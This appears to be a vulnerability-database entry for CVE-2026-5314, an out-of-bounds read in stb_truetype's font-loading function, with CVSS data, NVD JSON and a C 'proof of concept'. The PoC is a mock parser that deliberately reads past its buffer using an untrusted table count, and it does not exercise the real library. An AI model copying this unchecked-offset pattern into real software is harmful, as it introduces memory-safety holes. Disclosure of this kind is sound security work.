Security Vulnerability Report
CVE-2026-5314 CVSS 4.3 MEDIUM

Published: 2026-04-01 23:17:04
Last Modified: 2026-04-30 19:36:57

Description

A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:* - VULNERABLE
Nothings stb <= 1.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-5314: Out-of-bounds read in stbtt_InitFont_internal
 * This code demonstrates the triggering condition with a malformed TTF header.
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

// Mocking the vulnerable structure logic for demonstration
#define STBTT_MAX_OVERHEAD 100

// Simplified representation of the vulnerable function logic
int vulnerable_stbtt_InitFont_internal(unsigned char *data, int fontstart) {
    // In the real vulnerability, specific offsets in the TTF header are trusted blindly
    // without checking if they point within the 'data' buffer bounds.
    int numTables = *(uint16_t*)(data + fontstart + 4);
    printf("[+] Parsing %d tables...\n", numTables);

    // Vulnerability: Looping or accessing data based on untrusted 'numTables' or offsets
    // without verifying they are within the allocated buffer size.
    for (int i = 0; i < numTables; i++) {
        int offset = fontstart + 12 + (i * 16);
        // This read could go out of bounds if 'data' is small or 'numTables' is huge
        uint32_t tableOffset = *(uint32_t*)(data + offset + 8);
        printf("[+] Reading table at offset: 0x%x\n", tableOffset);

        // Simulating the crash/OOB access
        if (tableOffset > 10000) { // Arbitrary bound for simulation
            printf("[!] Potential Out-of-Bounds Read detected at high offset!\n");
        }
    }
    return 1;
}

int main() {
    // Allocate a small buffer to simulate a constrained memory environment
    // (zero-initialised so that the in-bounds reads return defined values)
    unsigned char *fake_font_data = (unsigned char *)calloc(1024, 1);
    if (!fake_font_data) return -1;

    // Setup a basic TTF header structure (SFNT version 1.0)
    // Bytes 0-3: SFNT version
    fake_font_data[0] = 0x00;
    fake_font_data[1] = 0x01;
    fake_font_data[2] = 0x00;
    fake_font_data[3] = 0x00;

    // Bytes 4-5: numTables (Set to a high value to trigger OOB in loop)
    // Setting a large number of tables to force reading beyond 1024 bytes
    fake_font_data[4] = 0xFF;
    fake_font_data[5] = 0xFF;

    printf("[*] Triggering CVE-2026-5314...\n");
    vulnerable_stbtt_InitFont_internal(fake_font_data, 0);

    free(fake_font_data);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5314", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:03.810", "lastModified": "2026-04-30T19:36:56.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.26", "matchCriteriaId": "9F48FE8E-19C5-4C38-AB64-1857C491714B"}]}]}], "references": [{"url": "https://gist.github.com/d0razi/cb31a92f3205a4373f19b7da25946848", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/submit/780558", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354646", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354646/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}